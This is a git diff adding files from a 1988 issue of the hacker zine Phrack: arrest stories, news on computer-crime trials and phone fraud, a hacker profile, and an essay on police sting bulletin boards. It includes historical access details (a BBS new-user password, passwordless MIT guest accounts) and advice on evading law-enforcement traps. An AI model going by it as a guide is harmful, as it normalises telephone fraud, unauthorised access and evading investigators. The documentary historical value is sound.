+     Diplomat.
+
+     I walked into my apartment and discover two police detectives, two phone
+     officials, and two "computer experts" blissfully dismantling my Apple and
+     all my peripherals.  One of my roommates was handcuffed and seated in a
+     chair and my other roommate was kept closely watched as he was sitting in
+     the kitchen.  I was asked who I was, and read my rights.  I agreed to
+     cooperate.  I was busted on a dialup.
+
+     The dialup being the one I had hacked out several months before, and
+     gotten quite greedy with it (ok, I overabused the darn thing).  In my
+     apartment, I placed around a $1000 worth of calls with it.  I had made
+     calls with it before, but not to that extent.
+
+     I remained very cooperative, and talked to several phone security
+     representatives, including those from AT&T and U.S. Sprint (I had a
+     printout of 4 Sprint Codes, never had used them, just had them).  The
+     phone security people are experts at adverse psychology, and I can
+     successfully say that they did a very good job of scaring me.
+     Nevertheless, I knew that they were trying to play with my brain, so it
+     wasn't as bad as it could have been.
+
+     My roommate had been charged with the same offense as myself, Class C
+     Felony Theft of Services (max 5 years/$5000).  However, the only thing he
+     contributed to the whole matter was the fact that the telephone account
+     was in his name.  The charges were dropped against him.
+
+     After almost two months of waiting, the sentence date came.  I plead
+     guilty, playing on a deal that my lawyer had made with the state's
+     attorney.  The sentence included restitution (which hasn't been determined
+     yet).  The phone company is desparately trying to stick me with a large
+     bill, for services that cannot be proven that I had anything to do with; a
+     bill that could stretch up to $5000 (like hell if I'm paying that much),
+     and a very nice little clause called Deferment of Imposition.  Basically,
+     I remain on probation until I pay back the restitution, at that time I can
+     go through hearings and prove that I haven't been involved in such
+     activities as for what I was convicted and the charges will not be placed
+     on my record.  For the time being however, it's turning out to be monthly
+     payments with supervised probation.  Needless to say, I, Docs Avage is
+     retired, at least as as retired as someone in my position can get."
+
+Docs said that he had been looking to retire for some time and that this
+incident was the final straw.  He also added that he was questioned about
+Jester Sluggo, Phrack Inc., and the Legion of Doom.  He did not know anything.
+
+               Information Provided by Docs Avage and SpyroGyra
+_______________________________________________________________________________
diff --git a/phrack21/11.txt b/phrack21/11.txt
new file mode 100644
index 0000000..ab778ae
--- /dev/null
+++ b/phrack21/11.txt
@@ -0,0 +1,285 @@
+                                ==Phrack Inc.==
+
+                     Volume Two, Issue 21, File 11 of 11
+
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+            PWN The Legacy...                       ...Lives On PWN
+            PWN                Phrack World News                PWN
+            PWN                   Issue XXI/2                   PWN
+            PWN                                                 PWN
+            PWN           Created by Knight Lightning           PWN
+            PWN                                                 PWN
+            PWN              Written and Edited by              PWN
+            PWN          Knight Lightning and Epsilon           PWN
+            PWN                                                 PWN
+            PWN The Future...                     ...Is Forever PWN
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+Man Charged with "Infecting" Computers                             May 24, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Fort Worth, Texas (AP) -- A 39-year-old computer programmer is being prosecuted
+on felony charges of infecting his ex-employer's computers with an electronic
+"virus," and face up to 10 years in prison if convicted.
+
+Donald Gene Burleson faces a charge of "harmful access to a computer," and is
+free on a $3,000 bond pending his July 11 trial.
+
+Police described the electronic interference as a "massive deletion" of more
+than 168,000 records of sales commissions for employees.
+
+Burleson is thought to be the first person charged under the state law
+prohibiting computer sabotage, which took effect Sept. 1, 1985, about three
+weeks before the alleged incident, said Davis McCown, chief of the Tarrant
+County district attorney's economic crimes division.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Jury Selection In First Virus Trial Begins                    September 6, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Taken from the Washington Post (September 7, 1988),Page C-1
+
+Fort Worth, Texas (AP) -- Jury selection began today in the criminal trial of a
+40-year-old programmer accused of using a computer "virus" to sabotage
+thousands of records at his former work place.  The trial is expected to last
+about two weeks.
+
+Donald G. Burleson faces up to 10 years in jail and a $5,000 fine if convicted
+in the trial, a first for the computer industry.  Burleson was indicted on
+charges of burglary and harmful access to a computer in connection with
+computer damage at a securities firm, said Nell Garrison, clerk of the state
+criminal district court in Fort Worth.  Through his lawyer, Jack Beech,
+Burleson denies the charges but has declined further comment.
+
+The firm has been awarded $12,000 in a civil lawsuit against Burleson.
+Pretrial motions were scheduled to be heard today, followed by jury selection,
+Garrison said.
+
+Burleson is accused of planting a piece of computer software known as a virus
+in the computer system at USPA&IRA Co. two days after he was fired.  A virus is
+a computer program, often hidden in apparently normal computer software, that
+instructs the computer to change or destroy information at a given time or
+after a certain sequence of commands.  USPA officials claim Burleson went into
+the company's offices one night and planted a virus in its computer records
+that would wipe out sales commissions records every month.  The virus was
+discovered two days later, after it had eliminated 168,000 records.
+_______________________________________________________________________________
+
+White Lightning Speaks Up                                         July 28, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~
+White Lightning was apparently previously accused of being an informant for
+Sprint Security with regard to information concerning The Disk Jockey and
+Compaq.
+
+He left the following message on the Phrack Voice Message System;
+
+"Yeah, this is White Lightning.  I'd like to make an official statement for
+ Phrack Magazine.  As far as what happened to The Disk Jockey, Shit, I have no
+ idea, ok?  I get on a bridge, I've been out of it for two weeks, I get on
+ Friday night, and fuck, this guy Laser outta 206 is saying I got him busted,
+ I don't know anything about it, ok?  As far as Compaq goes, outta 219, Kent,
+ I'd just appreciate it, your information is messed.. <BEEP!>  [The Phrack VMS
+ has a beep that lets you know that you only have 10 seconds left.]  What the
+ hell is that!?  Hello?!?  Who is that?!"
+
+Message For White Lightning from Phrack Inc.;
+
+    If you would care to explain your side of the story a little more clearly,
+    we would be happy to listen to what you have to say.  We are sure that
+    everyone would be interested.  Thank you.
+
+                    Information Provided By White Lightning
+_______________________________________________________________________________
+
+AT&T Links Up With GTE                                           August 1, 1988
+~~~~~~~~~~~~~~~~~~~~~~
+AT&T is stepping up its efforts to boost revenues from telecommunications gear
+by buying GTE's phone switch business.  AT&T will become the leading equipment
+supplier to GTE's phone companies, which are the main source of the
+switch operations $500 million in revenues.
+
+AT&T will take a 49% stake in a new company that will comprise GTE's switch
+manufacturing operations in Illinois and a research and development facility in
+Phoenix, Arizona.  GTE, whose business employs 5,000, is counting on AT&T's
+technical expertise to support its base of phone switching systems.  It also
+wants out of the phone equipment business.  AT&T's main task; making the
+switches capable of handling the massive voice and computer data transmission
+requirements anticipated by GTE's phone companies over the next 15 years.
+
+Neither partner disclosed financial terms of the joint venture.  But AT&T will
+own 80% of it by 1993 and 100% by 2003.  Its management structure is not yet
+decided.  GTE has made similar moves in recent years that have ended in giving
+full management control and ownership to its partners.  Such deals include one
+with West Germany's Siemens in communication transmission products and a second
+with Japan's Fujitsu in office phone systems.
+
+                Information Provided by Business Week Magazine
+_______________________________________________________________________________
+
+Is There A Doctor In The House?                                  August 1, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+It all started when I met him on a bridge in Texas.  No one really understands
+why he did it or why he chose that particular handle.  He seems to have some
+decent knowledge and would not have had much trouble reaching a high level of
+notoriety.  Unless there is more here than meets the eye.
+
+                   Doc Holiday/Scott of 713 is an IMPOSTER!
+
+He was doing a pretty good job pretending to be the original Doc Holiday.  He
+had researched all about him, including details concerning his recent bust for
+COSMOS abuse, and created a framing story to explain how and why he now was
+Scott instead of Robbie and how his family had moved from Tennessee to Texas.
+The majority of the phreak/hack community bought the story and he would have
+gone on unseen except for the return of some folks who had disappeared last
+fall; Knight Lightning and Taran King.  Upon hearing about this Doc Holiday in
+713, they already suspected that he was bogus, and once they had spoken to him
+they knew it was not the original Doc Holiday.  To bring a hilarious end to
+this charade they waited until they could contact the original Doc Holiday to
+let him in on the exposure.
+
+As destiny would have it, the real Doc Holiday was on vacation and happened to
+end up spending a weekend in St. Louis, the weekend right after SummerCon '88.
+So the three of them got together started Scott Holiday talking to further
+incriminate himself and then let the REAL Doc Holiday introduce himself and
+have the last laugh.
+
+Scott Holiday was in shock at first and he tried to explain that he had a good
+reason for doing it, but his mom got on the phone and he had to go.
+
+After this incident, I talked to him voice, and he explained to me that he
+enjoyed doing this, and it was "the biggest scam" he had ever pulled off,
+except that you could argue that he did not really pull it off.  Seeing as how
+Scott is quite adept at the art of social engineering, he really had little to
+no trouble convincing (for lack of a better word) people who did not know the
+original Doc Holiday.  However when he came up against the best, he failed the
+test miserably.
+
+The point of publicizing this incident is to document that people can be easily
+fooled and deceit by phone phreaks is not limited to the phone companies.  Keep
+in mind that people are not necessarily whom they claim and in that lies the
+greatest truth of all.
+
+                        Information Provided By Epsilon
+
+      Special thanks to Knight Lightning and Taran King for the exposure.
+_______________________________________________________________________________
+
+Canada Cancels The Underlord                                     August 3, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+                                "I still Hack!"
+
+The Underlord awoke on February 11, 1988 at 7:30 AM to the sound of his
+doorbell.  Moments later, his mother entered his room to inform him that there
+were three men waiting to see him.  She had a rather puzzled look on her face.
+He threw on some clothes and ran downstairs to meet his fate head on.  The "fat
+man" showed him a search warrant and informed him that he was under arrest for
+7 offenses.  They confiscated everything.
+
+The Underlord was escorted to their car (his mother followed behind) and driven
+off to the police station.  They told him something about cameras being all
+over the station, but it did not matter to him because, "I wasn't going to kill
+the guy or anything anyway."  From there he was taken to a little room, in
+which he overheard the police playing with my computer, phone, and tapes that
+they confiscated.
+
+He had to sit there alone for four hours until his dad drove his home and later
+showed his the papers.
+
+"They said I was being charged for four counts of 'theft of telecommunications'
+ (a real law in Canada), and three counts of mischief."
+
+He was told that the mischief charges were because he called Emergency 911
+(although he said he did it through a PBX) and told them obscenities with a
+friend on three-way.
+
+Practically six months later, on June 16, 1988, The Underlord finally received
+everything back and went to court.  He had to pay $750.00 total and serve eight
+months probation.  However, he only had the three counts of mischief on his
+record.
+
+He explained that in Canada, if the government wants to make you pay a fine,
+they must prove that you have enough money to pay it first.  However, UL did
+not and so the authorities said they would drop the charges if he would pay the
+$750.00.
+
+                  Information Provided By The Underlord 416
+                          Through The Phoenix Project
+_______________________________________________________________________________
+
+Teen Hackers Ring Up Huge Phone Bill                            October 7, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By Robert Macy (Associated Press)
+
+Las Vegas, Nevada - Ten teen-age hackers may have run up to $650,000 in
+telephone calls by tricking phone company computers, and their parents could be
+liable for the tab, authorities said.
+
+Tom Spurlock, resident agent-in-charge of the Las Vegas Secret Service office,
+said the teen-agers engaged in Blue Boxing, a technique that enabled them to
+talk to fellow hackers throughout Europe.
+
+The teen-agers were not taken into custody or charged, but their computers were
+seized.  Spurlock said it will be up to AT&T to decide whether to seek
+reimbursement once a final tally is obtained.
+_______________________________________________________________________________
+
+Virus Hits Unix at Bell Labs                                       May 13, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Friday the 13th, a devastating virus hit Bell Labs at Murray Hill.  Initial
+reports from survivors indicate that the destruction caused was very
+widespread, although limited to Sun workstations.  Rumor has it that the virus
+was planted by a disgruntled Sun employee in the Sun Unix kernel.  The actual
+amount of work lost is unknown, as is the Murray Hill policies on frequency of
+disk backups.
+_______________________________________________________________________________
+
+Translation Of 2600 Magazine                                          Fall 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+The following appeared on page 46 of 2600 Magazine, Volume 5, Number 3.  It was
+in German and I took the liberty of having a friend who is a member of the
+Chaos Computer Club in Germany translate it for PWN.
+
+"Hacker" Free Again
+~~~~~~~~~~~~~~~~~~~
+One of the heads of the Hamburg CCC, S. Wernery, was released from jail in
+Paris.  The 26-year-old arrived at Hamburg airport yesterday (whenever that
+was, there was no date on the article).  He stated the accusations against him
+were still being investigated.  After having been questioned by a judge he was
+released from bail, but has to return to Paris at request, though.
+
+:Knight Lightning
+_______________________________________________________________________________
+
+Quicknotes
+~~~~~~~~~~
+1. BIG! The New Telecom Library Catalog!  1-800-Library.  Free, 125 Books, etc.
+-------------------------------------------------------------------------------
+2. The Teleconnect Dictionary; A Glossary of Telecom Acronyms, Terms, and
+   Jargon.  Not just definitions...mini essays.  $9.95 -- 1-800-LIBRARY.
+-------------------------------------------------------------------------------
+3. Microlog Demo Numbers - Microlog, Irvine, California, makes voice response
+   equipment.  Call for demos:
+
+               o Microlog                         (800)562-2822
+               o Immigration and Naturalization   (800)777-7770
+               o Canadian Embassy                 (202)785-1431
+               o Office of Personal Management    (202)653-8468
+               o Australian Consulate             (202)797-3161
+-------------------------------------------------------------------------------
+4. Most accurate time in the world; (303)499-7111.  It's tied to the atomic
+   clock at the National Bureau of Standards in Boulder, Colorado.
+-------------------------------------------------------------------------------
+5. Sue the United States Postal Service?  Good Luck.
+   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+   If the US Postal Service loses a package sent by Express Mail, you can't sue
+   for damages the way you can other delivery services.
+
+   Reason:  The United States government is immune from lawsuits except when
+   they consent to being sued.  The Postal Service has retained this immunity.
+-------------------------------------------------------------------------------
+6. Announcing a new electronic mailbox named Sub-Etha.  It is owned and
+   operated by the Computer Club of Oldenburg, West Germany.
+
+                  Phone number: (0441/777397)  300 Baud N/8/1
+_______________________________________________________________________________
+
diff --git a/phrack21/2.txt b/phrack21/2.txt
new file mode 100644
index 0000000..6220520
--- /dev/null
+++ b/phrack21/2.txt
@@ -0,0 +1,131 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 21, File 2 of 11
+
+                          == Phrack Pro-Phile XXI ==
+
+
+The Phrack Pro-Phile's purpose is to present to the reader profiles of older or
+influential hackers or phreakers that have or do exist.  This month's Pro-Phile
+features a user of past days...Modem Master, a.k.a. Napoleon Solo.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Personal Information
+~~~~~~~~~~~~~~~~~~~~
+       Handle:  Napolean Solo
+      Call me:  Scott
+  Past Handle:  Modem Master
+Handle Origin:  I used to be a real "Man from UNCLE" fan
+    D.O.Birth:  March 29, 1970
+  Current Age:  18 yrs.
+       Height:  6'0"
+       Weight:  207 lbs
+         Eyes:  Hazel
+         Hair:  Light Brown
+    Computers:  Apple //+, Apple //gs, normal extra hardware, 2400 baud modem
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+I started on my way to hackerdom in early 1983 when I bought my first modem, a
+Networker 300 baud (What a gem!!) to use in my Apple II+.  I asked the
+salesperson for the numbers of the local boards (at the time there were a whole
+3 here, and one was an IBM users group board).  Well, it just so happened one
+was an Apple board run on an old version of Networks II, with a sysop who had
+been known to rip off a local extender here and there.  After chatting with him
+for a while he realized I was one of those eager-to-learn Jr. High kids, so he
+put me in touch with several other users of his board.  Well, one of those was
+Simon Templar, who would later be the sysop of the Pearly Gates, and I guess to
+me, about as close a friend a phreak can have that lives 1000 miles a way.
+
+Simon gave me my first code (to an 800 number owned by LDX), and the numbers of
+some boards where I might pick up some more additional knowledge (IC's Socket,
+AT&T Phone Center, and Sherwood Forest).  Well, after pestering just about
+anybody that seemed to know ANYTHING, I was on my way.  Soon, I was frequenting
+at least one board in almost every area code.  I also learned the advantage of
+scanning exchanges, I found several local PBXes and a Sprint indial that nobody
+seemed to known about.  That facilitated my "habit" even more and I then found
+a little Diversi-Dial dubbed "Beandial."  That was where I really got off the
+ground.  It was frequented by many knowledgeable phreaks, so between that and
+all of the BBSes I was on, I had a wealth of knowledge to look to all at my
+fingertips when I had a question.
+
+Beandial also left me with several good friends, the most notable being Lord
+Kahz.  It also put me in touch with someone rather well known, King Blotto (you
+should have seen my face the night my phone rang and the guy at the other end
+said "Hi, this is King Blotto, wanna be on my board?" and gave me the number!).
+ As of the last several years, I have left the mainstream phreaking life, and
+only look in once in a while through past friends.  That may change now, as
+Taran King and Knight Lightning have shown me that there are in fact TRUE
+phreaks left.  I was beginning to doubt it, hence my absence.
+
+Memorable bulletin boards that I have been on include; The Pearly Gates, AT&T
+Phone Center, Blottoland (even though I was only actually on during the last
+phase of its life), and Bean Dial, plus all the normal ones that everybody and
+his brother were on.
+
+Currently I am enrolled at North Dakota State University, majoring in computer
+engineering.  I work at McDonalds flippin' dem burgers.
+
+Regrets
+~~~~~~~
+I regret leaving the phreak world in the first place, I was disillusioned
+with all the little nerds with computers and modems who thought they were
+phreaks just because some dork they knew gave them a code.
+
+
+Favorite Things
+~~~~~~~~~~~~~~~
+Chicks:  The ones with really big...  uh..  Brains!  Thats it! Ya know, they
+         stick out their bras..  Uh.. I mean their intelligence protrudes!!
+         Ya! thats it!
+People:  I like just about anybody who has something interesting and
+         meaningful to talk about (and chicks with big ****)
+
+Music:  70's music like Led Zeppelin, and most heavy metal bands.  I also can
+        go for top 40 as long as we aren't talking Whitney, or Jackson, or G.
+        Michael or some other puke like that.
+
+
+Most Memorable Experiences
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+The time me and a friend from Idaho called this local guy who THOUGHT he was a
+phreak.  I talked to him on one line, while MIKE talked to him long distance on
+another, convincing him that AT&T security had really busted his ass.  I've
+never heard ANYONE sound so scared in my life! HAHAH
+
+Starting on my high school's varsity football team for two years instead of the
+average 0-1 yr.
+
+
+Some people to mention
+~~~~~~~~~~~~~~~~~~~~~~
+Lord Kahz
+Cookie Cruncher
+Android Base -- for pointing me in the right direction
+Simon Templar -- for taking that direction and showing me what to do with it.
+
+All others who have helped me in anyway, whether it be questions I had, or
+whatever else...  Thanks.
+
+
+Inside Joke
+~~~~~~~~~~~
+To Kahz:  "Hey MM, let's call Mari!"
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Serious Section
+~~~~~~~~~~~~~~~
+I think people who abuse CCs are assholes.  That does nothing but hurt all of
+us; all that comes out of it is one person's gain and many people's suffering.
+Example; Sysops of the board where the inevitably BUSTED asshole posted his CC
+numbers.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Although he has never met any hackers, Scott feels that there are a few geeks
+out there based on some of his phone conversations.
+
+Thanks for your time Scott.
+
+                                                  Taran King
diff --git a/phrack21/3.txt b/phrack21/3.txt
new file mode 100644
index 0000000..94bc785
--- /dev/null
+++ b/phrack21/3.txt
@@ -0,0 +1,550 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 21, File 3 of 11
+
+       <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+       <>                                                            <>
+       <>                  Shadows Of A Future Past                  <>
+       <>                  ~~~~~~~~~~~~~~~~~~~~~~~~                  <>
+       <>           Part One Of The Vicious Circle Trilogy           <>
+       <>                                                            <>
+       <>        A New Indepth Look At A Re-Occurring Problem        <>
+       <>                     by Knight Lightning                    <>
+       <>                                                            <>
+       <>                       August 6, 1988                       <>
+       <>                                                            <>
+       <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+
+The Problem?
+~~~~~~~~~~~~
+The fate of the entire modem community for the most part is based on the
+foundation of computer bulletin boards.  These realms of information exchange
+have become centers of learning and trading various information for thousands
+of hackers across the United States and even the world.
+
+However, today's security consultants and law enforcement agencies are smarter
+than ever too and they know where to strike in order to do the most damage.
+The concept of creating a bulletin board for the purpose of catching hackers
+was unheard of until The Phoenix Phortress Incident of 1986.  The creation of
+this bulletin board system enabled Sergeant Dan Pasquale of the Fremont Police
+Department the ability to penetrate the sacred barrier between the phreak/hack
+community and the rest of the world.
+
+This file will attempt to show the extent of this problem within the community
+and hopefully will lead readers to discover ways of protecting themselves from
+the many "venus fly traps" they are likely to encounter.  Articles presented in
+this file are specially edited reprints from past issues of Phrack World News.
+
+
+The Evidence - The unseen truths reside in the shadows of our past and future.
+~~~~~~~~~~~~
+The following is an excerpt from Phrack World News Issue III;
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Phoenix Phortress Stings 7
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+On March 5, 1986, the following seven phreaks were arrested in what has come to
+be known as the first computer crime "sting" operation.
+
+           Captain Hacker \ Doctor Bob \ Lasertech \ The Adventurer
+                  The Highwayman \ The Punisher \ The Warden
+
+Many of them or other members of Phoenix Phortress belonged to these groups:
+
+  High Mountain Hackers \ Kaos Inc. \ Shadow Brotherhood \ The Nihilist Order
+
+Of the seven, three were 15 years old; two were 16; one was 17; and one, 19.
+
+Their charges include:
+
+Several misdemeanors
+Trafficking in stolen long distance service codes
+Trafficking in stolen credit card numbers
+Possession of stolen property
+Possession of dangerous weapons (a martial arts weapon)
+Charging mail-order merchandise to stolen credit card numbers
+Selling stolen property
+Charging calls internationally to telephone service numbers
+
+Other phreak boards mentioned include:
+
+Bank Vault (Mainly for credit card numbers and tips on credit card scams)
+Phreakers Phortress (Mainly of course for phreak codes and other information)
+
+After serving search warrants early Wednesday morning on the seven Fremont
+residences where the young men lived with their parents, police confiscated at
+least $12,000 worth of equipment such as computers, modems, monitors, floppy
+disks, and manuals, which contained information ranging from how to make a
+bomb, to the access codes for the Merrill Lynch and Dean Witter Financial
+Services Firm's corporate computers.
+
+The sysop of Phoenix Phortress was The Revenger, who was supposedly Wally
+Richards, a 25 year-old Hayward man who "phreaked back east a little" in New
+Jersey.  He took the phone number under the name of Al Davis.  However he was
+really Sgt. Daniel Pasquale of the Fremont Police Department.
+
+When he introduced his board to other computer users, he called it the "newest,
+coolest, phreak board in town."
+
+Pasquale said he got the idea for the sting operation after a 16-year old
+arrested last summer for possession of stolen property "rolled them over
+(narced) He told us all about their operation."
+
+Pasquale used a police department Apple //e computer and equipment, with access
+codes and information provided by eight corporations, including Wells Fargo
+Bank, Sprint, and MCI.
+
+Pasquale said he received more than 2,500 calls from about 130 regular users
+around the country.  The police started to make their first case three days
+after the board went up.
+
+"We had taken the unlisted phone number under the name Al Davis," Pasquale
+said. "In six days, these kids had the name on the bulletin board.  I would
+have needed a search warrant to get that information."
+
+The arrests were made after five months of investigation by Dan Pasquale.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+The Phoenix Phortress incident only led to the arrest of seven hackers.
+However, at the same time it enabled the law enforcement agencies to gather
+information about over one hundred other hackers, systems being discussed,
+anything transmitted in electronic mail on the bulletin board, and most likely
+gave them information about hundreds of other hackers, bulletin boards, and so
+forth.
+
+The following is an excerpt from Phrack World News Issue VII;
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Maxfield Strikes Again                                          August 20, 1986
+~~~~~~~~~~~~~~~~~~~~~~
+Many of you probably remember a system known as "THE BOARD" in the Detroit 313
+NPA.  The number was 313-592-4143 and the newuser password was
+"HEL-N555,ELITE,3" (then return).  It was kind of unique because it was run off
+of an HP2000 computer.
+
+On August 20, 1986 the following messages began to appear on THE BOARD;
+-   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -
+
+                Welcome to MIKE WENDLAND'S I-TEAM sting board!
+                   (Computer Services Provided By BOARDSCAN)
+                             66 Megabytes Strong
+
+                           300/1200 baud - 24 hours.
+
+                      Three (3) lines = no busy signals!
+                        Rotary hunting on 313-534-0400.
+
+
+Board:   General Information & BBS's
+Message: 41
+Title:   YOU'VE BEEN HAD!!!
+To:      ALL
+From:    HIGH TECH
+Posted:   8/20/86 @ 12.08 hours
+
+Greetings:
+
+You are now on THE BOARD, a "sting" BBS operated by MIKE WENDLAND of the
+WDIV-TV I-Team.  The purpose?  To demonstrate and document the extent of
+criminal and potentially illegal hacking and telephone fraud activity by the
+so-called "hacking community."
+
+Thanks for your cooperation.  In the past month and a half, we've received all
+sorts of information from you implicating many of you to credit card fraud,
+telephone billing fraud, vandalism, and possible break-ins to government or
+public safety computers.  And the beauty of this is we have your posts, your
+E-Mail and--- most importantly ---your REAL names and addresses.
+
+What are we going to do with it?  Stay tuned to News 4.  I plan a special
+series of reports about our experiences with THE BOARD, which saw users check
+in from coast-to-coast and Canada, users ranging in age from 12 to 48.  For our
+regular users, I have been known as High Tech, among other ID's.  John Maxfield
+of Boardscan served as our consultant and provided the HP2000 that this "sting"
+ran on.  Through call forwarding and other conveniences made possible by
+telephone technology, the BBS operated remotely here in the Detroit area.
+
+When will our reports be ready?  In a few weeks.  We now will be contacting
+many of you directly, talking with law enforcement and security agents from
+credit card companies and the telephone services.
+
+It should be a hell of a series.  Thanks for your help.  And don't bother
+trying any harassment.  Remember, we've got YOUR real names.
+
+Mike Wendland
+The I-team
+WDIV, Detroit, MI.
+
+
+Board:   General Information & BBS's
+Message: 42
+Title:   BOARDSCAN
+To:      ALL
+From:    THE REAPER
+
+This is John Maxfield of Boardscan.  Welcome!  Please address all letter bombs
+to Mike Wendland at WDIV-TV Detroit.  This board was his idea.
+
+The Reaper (a.k.a. Cable Pair)
+-------------------------------------------------------------------------------
+John Maxfield was in general extremely proud of his efforts with THE BOARD and
+he said that a lot of the people he voice verified should have known it was
+him.  According to John Maxfield, the only reason this sting board was put up
+was to show "What is currently happening in the phreak/hack community."   He
+said no legal action will be taken at all, and besides, its fattened his
+"dossiers" on a lot of people!
+
+   [The news stories for WDIV-TV 4 appeared in Phrack World News Issue IX.]
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Now, this is a classic example of people not learning from other people's
+mistakes.  At some point in time prior to this incident, the number for THE
+BOARD was posted, it was given a lot of hype and eventually it drew in hackers
+to THE BOARD like flies to a spider web from which the unsuspecting users never
+broke free.
+
+That is the point I am trying to make -- today's phreak/hacker must learn to be
+more security conscious.  What makes anyone think that they can trust someone
+just because they are running a bulletin board?  This blind faith is what will
+be the downfall of many a hacker until they wise up and start paying attention
+to what they are doing.  Safety first; the stakes in this game are a lot higher
+than no television after school for a week because once a hacker's phone number
+falls into the wrong hands, the law enforcement community or organizations like
+the Communications Fraud Control Association (CFCA) can find out everything
+about you.  I know because I have seen their files and their hacker data base
+is so incredibly large and accurate...its unbelievable.
+
+The following is an excerpt from Phrack World News Issue XIV;
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Metalland South:  Phreak BBS or MetaliFEDS Inc.?                   June 2, 1987
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Metalland South BBS, at 404-327-2327, was once a fairly well known bulletin
+board, where many respected members of the hack/phreak community resided.  It
+was originally operated by two guys from Metal Communications, Inc., but it
+wasn't an MCI club board.  The sysop was Iron Man and the co-sysop was Black
+Lord.  Recently, it has come to the writer's attention, that MLS has come under
+new management, new policies, and possibly a new idea; Sting.
+
+Somewhere around September-October 1986, Iron Man removed all of the hack/
+phreak related subboards as well as all G-philes from the system.  He was
+apparently worried about getting busted.  The last time this reporter spoke
+with him, Iron Man said he intended to put the hack/phreak subs back up.  Then,
+not long after this conversation, the number was changed (The original number
+was 404-576-5166).
+
+A person using the alias of The Caretaker was made co-sysop and Iron Man would
+not reply to feedback.  Everything was handled by The Caretaker [TC from now
+on].  TC did not allow any hack/phreak subs, but said he would put them up if
+the users would follow STRICT validation procedures.
+
+Strict validation on MLS includes:
+
+^*^  Your Real Name
+^*^  Your Address
+^*^  Your Voice Phone Number
+^*^  A Self-Addressed Envelope (in which he will send back with your account
+                                number and password.)
+
+It is obvious to see the ramifications here.  A board or sysop gets busted and
+then makes a deal to turn over the board to some company or agency.  To make
+sure that they get who they want, you have to give them all this info, and the
+only you can get a password is to let them mail it to you, thus guaranteeing
+that if something illegal is posted under that account, you are responsible, no
+ifs, ands, or buts.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+There was more information that went on to prove that Metalland South was
+indeed some kind of a trap or sting board and the whole aura of mystery
+surrounding this system made it not worth calling.
+
+Do not EVER give a sysop your address so he can send you your password.  There
+is no need for such information as it can only hurt you severely and would not
+benefit the sysop in any way that would leave you unharmed.
+
+One other item concerning bulletin boards comes from PWN Issue V where mention
+of yet another hacker sting board named The Tunnel was discovered in Texas.
+And lets not forget about TMC's P-80, sysoped by Scan Man, that was responsible
+for the apprehension of Shawn of Phreakers Quest (also known as Capt. Caveman).
+
+However, do not fool yourself into believing that bulletin boards are the only
+places you are likely to run into trouble.  Regular systems that you like to
+work with may be just as dangerous if you are not careful.  Druidic Death and
+Celtic Phrost found this out the hard way on the Unix system at MIT as they
+nearly succumbed to the power of progressive entrapment which would have doomed
+them both.
+
+The following is an excerpt from Phrack World News Issue XI;
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+MIT Unix:  Victim or Aggressor?                   January 23 - February 2, 1987
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Was the MIT system an innocent victim of hacker oppression or simply another
+trap to capture unsuspecting hackers in the act?
+
+It all started like this...
+
+      [Some posts have been slightly edited to be relevant to the topic]
+
+------------------------------------------------------------------------------
+MIT
+Name: Druidic Death
+Date: 12:49 am  Mon Jan 20, 1986
+
+Lately I've been messing around on MIT's VAX in there Physics Department.
+
+Recently some one else got on there and did some damage to files.  However MIT
+told me that they'll still trust us to call them.  The number is:
+
+617-253-XXXX
+
+We have to agree to the following or we will be kicked off, they will create a
+"hacker" account for us.
+
+<1>  Use only GUEST, RODNEY, and GAMES.  No other accounts until the hacker one
+     is made.  There are no passwords on these accounts.
+<2>  Make sure we log off properly.  Control-D.  This is a UNIX system.
+<3>  Not to call between 9 AM and 5 PM Eastern Standard Time.  This is to avoid
+     tying up the system.
+<4>  Leave mail to GEORGE only with UNIX questions (or C).  And leave our
+     handles so he'll know who we are.
+
+------------------------------------------------------------------------------
+Unix
+Name: Celtic Phrost
+Date: 4:16 pm  Mon Jan 20, 1986
+
+Thanks Death for the MIT computer, I've been working on getting into them for
+weeks.  Here's another you can play around with:
+
+                           617/258-XXXX  login:GUEST
+
+Or use a WHO command at the logon to see other accounts, it has been a long
